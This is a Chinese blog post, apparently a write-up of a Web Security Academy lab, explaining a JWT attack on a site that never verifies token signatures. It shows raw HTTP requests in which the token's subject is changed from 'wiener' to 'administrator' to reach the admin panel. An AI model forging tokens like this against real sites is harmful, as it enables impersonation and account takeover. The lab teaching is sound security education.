6种常见的JWT Attack,绕过网站身份验证 - 1.签名未验证

已于 2024-04-06 10:13:16 修改
阅读量318 收藏 4
点赞数 5
分类专栏: 网络空间安全 web安全 文章标签: 安全 web安全 安全威胁分析 系统安全 安全性测试 威胁分析
于 2024-04-04 22:21:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/raymond0820/article/details/137384013
版权

简介

JWT攻击是使用者向网站发送修改后的JWT,目标是冒充另一个身份的使用者,并绕过身份验证和存取控制。 如果攻击者能够使用任意值创建自己的JWT有效令牌,他们能够升级自己的权限或冒充其他用户,完全控制他们的帐户。

JWT常见攻击手法有以下几种:

  1. 签名未验证
  2. JWT无签名
  3. 爆力破解对称式加密签名
  4. 用kid绕过对称式加密签名
  5. 用JWK绕过非对称式加密签名
  6. 用JKU绕过非对称式加密签名


关于JWT的介绍可参考json web token介绍

1.签名未验证

网站没有验证JWT签名,攻击者可以对JWT内容任意更改
举例如下,当存取admin页面时,返回只有administrator帐户才能使用

################ request ################ 
GET /admin HTTP/1.1
Host: 0a36001b04ccef7bc0a7741d006c0066.web-security-academy.net
Cookie:session=eyJraWQiOiI0ZjY1MzkzNC0yMTM3LTQzNGItYjE0OC0yNzg4Y2Y0OGRlMWYiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NjU3ODQxNH0.Hp6sPpaIOCVwA34Eb2-h_pU2r6dUH_ZptjPt07uvKcF6z7PGUKWTV6ZQqXMoArudgF2E0WyAP0BYzoYZ1M4WVu4tUY3v_1Tnbf7-H_EqIDihcQ6KuxNaXNNPZw22GGvVgUdCsy3XgfZFH_LY5raFPpjavJ5aAOcqXG58zQlFYWcU5Kye2xB5AczvbDEDnpvQk00ygPBPSnXbV4JIk1jRJDM1suI5LN_tKn7LD_oBOwRGaJtreNekpV-8NXqbxzfjgVqAmHhQz6ZDxV-5LmiHT9yXVX7PdsUt5xhfrZYkTd_s8n6s0RvHvR1gwueVCplJqecZRRCkaAzwF9O1M9GwPw
Cache-Control: max-age=0
...omit...

################ response ################ 
...omit... only allow administrator ...omit...

使用JWT editor可以发现,token中的eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NjU3ODQxNH0等于以下

{
    "iss": "portswigger",
    "sub": "wiener",
    "exp": 1656578414
}

透过JWT editor将上述内容改为administrator

{
    "iss": "portswigger",
    "sub": "administrator",
    "exp": 1656578414
}

此时token里这部份会变成eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY1Nzg0MTR9
送出编辑token后的请求,可成功存取admin介面

################ request ################ 
GET /admin HTTP/1.1
Host: 0a36001b04ccef7bc0a7741d006c0066.web-security-academy.net
Cookie:session=eyJraWQiOiI0ZjY1MzkzNC0yMTM3LTQzNGItYjE0OC0yNzg4Y2Y0OGRlMWYiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY1Nzg0MTR9.Hp6sPpaIOCVwA34Eb2-h_pU2r6dUH_ZptjPt07uvKcF6z7PGUKWTV6ZQqXMoArudgF2E0WyAP0BYzoYZ1M4WVu4tUY3v_1Tnbf7-H_EqIDihcQ6KuxNaXNNPZw22GGvVgUdCsy3XgfZFH_LY5raFPpjavJ5aAOcqXG58zQlFYWcU5Kye2xB5AczvbDEDnpvQk00ygPBPSnXbV4JIk1jRJDM1suI5LN_tKn7LD_oBOwRGaJtreNekpV-8NXqbxzfjgVqAmHhQz6ZDxV-5LmiHT9yXVX7PdsUt5xhfrZYkTd_s8n6s0RvHvR1gwueVCplJqecZRRCkaAzwF9O1M9GwPw
Cache-Control: max-age=0
...omit...

################ response ################ 
...omit...
<section>
<p>User deleted successfully!</p>
	<h1>Users</h1>
	<div>
	<span>wiener - </span>
	<a href="/admin/delete?username=wiener">Delete</a>
...omit...

其他方法可参考

6种常见的JWT attack方法

Web Security Academy



 

牛的大腦-網站安全
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
AS-23-Yuanzhen-A-new-attack-interface-in-Java.pdf
11-17
AS-23-Yuanzhen-A-new-attack-interface-in-Java
shiro_attack-2.2.jar
12-17
shiro_attack-2.2.jar
shiro-attack-4.7.0-SNAPSHOT-all.zip
10-24
shiro_attack-4.7.0-SNAPSHOT-all.zip 序列化验证工具
Space Attack游戏代码-haiyong.site.zip
05-16
Space Attack游戏是一款经典的射击类游戏,主要使用HTML、CSS和JavaScript技术进行开发。游戏的主要功能包括: 玩家控制一个宇宙飞船,通过键盘上的方向键或者鼠标进行移动。 游戏中会出现各敌人,玩家需要控制飞船进行射击,消灭敌人。 敌人被消灭后,会随机掉落道具,玩家可以通过收集道具来增加生命值或者增加攻击力。 游戏有多个关卡,每个关卡的敌人数量和难度都会逐渐增加。 游戏有计分系统,玩家的得分会根据消灭的敌人数量和收集的道具数量进行计算。 游戏有生命值系统,当玩家的生命值降为0时,游戏结束。 游戏有排行榜系统,玩家可以看到自己在全球玩家中的排名。 在技术方面,主要使用了以下几技术: HTML和CSS用于创建游戏的基本布局和样式。 JavaScript用于实现游戏的交互逻辑,包括玩家的移动、射击、敌人的出现和消失、道具的掉落和收集等。 使用了Canvas API进行游戏画面的绘制,包括玩家的飞船、敌人、道具和背景等。 使用了requestAnimationFrame函数进行动画的更新,使得游戏运行更加流畅。 使用了事件监听器来处理玩家的操作,包括键盘事件和鼠标事件。 使用了随机数生成器来生成敌人的出现位置和道具的掉落位置。 使用了localStorage来存储玩家的得分和排名,使得玩家可以在不同设备上继续游戏。 通过这些技术和功能,Space Attack游戏为玩家提供了一个富有挑战性和趣味性的游戏体验。
shiro-attack-4.5.2-SNAPSHOT-all.7z
01-16
shiro漏洞利用工具
6常见JWT Attack,绕过网站身份验证 - 2.JWT签名
raymond0820的博客
04-06 155
JWT攻击是使用者向网站发送修改后的JWT,目标是冒充另一个身份的使用者,并绕过身份验证和存取控制。 如果攻击者能够使用任意值创建自己的JWT有效令牌,他们能够升级自己的权限或冒充其他用户,完全控制他们的帐户。
6常见JWT Attack,绕过网站身份验证 - 3.爆力破解对称式加密签名
raymond0820的博客
04-07 682
JWT攻击是使用者向网站发送修改后的JWT,目标是冒充另一个身份的使用者,并绕过身份验证和存取控制。 如果攻击者能够使用任意值创建自己的JWT有效令牌,他们能够升级自己的权限或冒充其他用户,完全控制他们的帐户。
JSON Web 令牌 (JWT)攻击
weixin_42451330的博客
07-30 736
1.1 生成密钥:首先,需要生成一个密钥(secret key),这个密钥只有发送方和接收方知道。1.2 签名:在JWT中,要对头部和有效载荷进行签名,首先将头部和有效载荷进行Base64编码,得到两个字符串,分别记为header_base64和payload_base64。
浅析JWT Attack
蚁景网安学院
12-13 1069
在2022祥云杯时遇到有关JWT的题,当时没有思路,对JWT进行学习后来对此进行简单总结,希望能对正在学习JWT的师傅们有所帮助。
深入解析JWT,从根源上保障你的网络安全
wuli1024的博客
12-07 1373
JWT结构 JWT由三部分组成,分别是头部、载荷和签名。头部用于描述签名算法和类型,载荷用于存储用户信息和过期时间等,签名用于验证Token的合法性和完整性。JWT优点 相比于传统的Session认证方式,JWT具有以下优点:无状态、可扩展、安全性高、跨平台、可自定义负载等。JWT使用场景 JWT适用于前后端分离的Web应用,如SPA单页面应用,APP等场景下。同时,JWT也可以用于微服务架构中的服务认证和授权。
JWT安全问题
tomyyyyy
08-12 2948
目录JWT介绍JWT的定义JWT的由来JWT的构成HeaderPayloadSignatureJWT和Token的区别JWT使用方式JWT安全风险1.敏感信息泄露2.校验签名3.签名算法可被修改为none(CVE-2015-2951)4.签名密钥可被爆破5.修改非对称密码算法为对称密码算法(CVE-2016-10555)6.伪造密钥(CVE-2018-0114)JWT toolJWT的使用建...
第40天-JAVA 安全-JWT 安全及预编译 CASE 注入等
MCTSOG的博客
04-01 1327
文章目录思维导图Java应用JWT什么是 JWT?头部 (Header)声明(Claims)JWT 固定参数有:签名(Signature)身份验证和获取JWT令牌获取令牌的基本顺序如下:SQL Injection(mitigation)防御 sql 注入,其实就是 session,参数绑定,存储过程这样的注入。演示案例:Javaweb-SQL 注入攻击-预编译机制绕过Javaweb-身份验证攻击-JWT 修改伪造攻击Javaweb-身份验证attack-JWT密匙爆破attackCTF-Node.js-前端
jwt简介
花&败
11-28 619
JSON Web Token(缩写 JWT)是目前最流行的跨域认证解决方案,是一个开放标准(RFC 7519),它定义了一紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任,因为它是数字签名的。 一、跨域认证的问题  HTTP协议是无状态的,也就是说,如果我们已经认证了一个用户,那么他下一次请求的时候,服务器不知道我是谁,我们必须再次认证。  互联网服务离不开用户认证。一般流程是下面这样。 1、用户向服务器发送用户名和密码。 2、服务器验证通过后,在当前对话(s
linux系统安全及应用
最新发布
Alone8046的博客
05-30 224
一、新的服务器到手该如何部署:1.配置IP地址,网关,dns解析,内外网。3.磁盘分区:lvm及raid。二、应用:1.不需要或者不想登录的用户设置为nologin:usermod -s nologin +用户。解锁文件:chattr -i /etc/passwd。提供了一标准的身份认证的接口(对账号权限进行控制),可以允许管理员定制化配置各认证方式和方法。(配置的时候一定要注意:有限放开原则,用什么给什么,不需要的不加)会话管理模块:管理用户的会话,记录会话信息,注销用户的会话,远程终端连接。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 914
防火墙是一网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
适合能源企业的文档安全外发系统应该是什么样的?
文件数据安全交换
05-29 288
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,现有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。
导线防碰撞警示灯:高压线路安全保障
dxzhkj888888的博客
05-30 210
同时,警示灯的反光材料也起到了至关重要的作用,无论是白天还是夜晚,都能将光线反射到最远的距离,让警示效果倍增。导线防碰撞警示灯也叫高压线太阳能警示灯、户外高压线路夜间红色闪光灯,以其独特的设计和卓越的性能,成为了电力安全领域的保障。在广袤的大地上,高压线路如同血脉般纵横交错,然而,在这看似平静的电力输送背后,却隐藏着不容忽视的安全隐患。而到了夜晚,警示灯便开始了它的使命。导线防碰撞警示灯的出现,使得那些驾驶超高车辆、操作超高施工机械的司机们,也在警示灯的提醒下,更加谨慎地行驶和操作,避免了可能发生的危险。
def cooldowns(self): current_time = pygame.time.get_ticks() if not self.can_attack: if current_time - self.attack_time >= self.attack_cooldown: self.can_attack = True if not self.vulnerable: if current_time - self.hit_time >= self.invincibility_duration: self.vulnerable = True对此代码进行注解
06-03
好的,以下是对这段代码的注释: ```python def cooldowns(self): # 获取当前时间 current_time = pygame.time.get_ticks() # 如果角色不能攻击 if not self.can_attack: # 如果距离上次攻击已经过了攻击冷却时间 if current_time - self.attack_time >= self.attack_cooldown: # 将 can_attack 标记为 True,表示可以再次攻击 self.can_attack = True # 如果角色不处于无敌状态 if not self.vulnerable: # 如果距离上次受到攻击已经过了无敌时间 if current_time - self.hit_time >= self.invincibility_duration: # 将 vulnerable 标记为 True,表示可以再次受到攻击 self.vulnerable = True ``` 这段代码主要是控制角色攻击和无敌状态的冷却机制。其中 `pygame.time.get_ticks()` 函数用于获取当前时间,以毫秒为单位。代码中的 `can_attack` 和 `vulnerable` 变量分别表示是否能够攻击和是否处于无敌状态。 在代码中,首先判断角色是否能够攻击。如果不能攻击,则判断距离上次攻击是否已经过了攻击冷却时间。如果已经过了攻击冷却时间,就将 `can_attack` 设置为 True,表示可以再次攻击。 接着判断角色是否处于无敌状态。如果不是无敌状态,则判断距离上次受到攻击是否已经过了无敌时间。如果已经过了无敌时间,就将 `vulnerable` 设置为 True,表示可以再次受到攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值